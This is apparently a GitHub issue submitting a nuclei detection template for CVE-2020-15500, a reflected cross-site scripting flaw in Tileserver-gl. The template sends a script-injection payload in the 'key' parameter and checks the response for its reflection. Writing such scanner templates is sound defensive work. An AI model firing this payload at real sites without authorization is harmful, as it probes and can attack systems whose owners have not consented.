### ISSUE TITLE
[nuclei-template] CVE-2020-15500

### ISSUE THREAD

**Issue by akashc99** [projectdiscovery/nuclei-templates#1252]
***CVE-2020-15500***

```yaml
id: CVE-2020-15500

info:
  name: Tileserver-gl XSS
  author: Akash.C
  severity: medium
  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15500
  tags: cve,CVE-2020-15500,xss


requests:
  - method: GET
    path:
      - '{{BaseURL}}/?key="><script>alert(document.domain)</script>"'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '"><script>alert(document.domain)</script>'


```
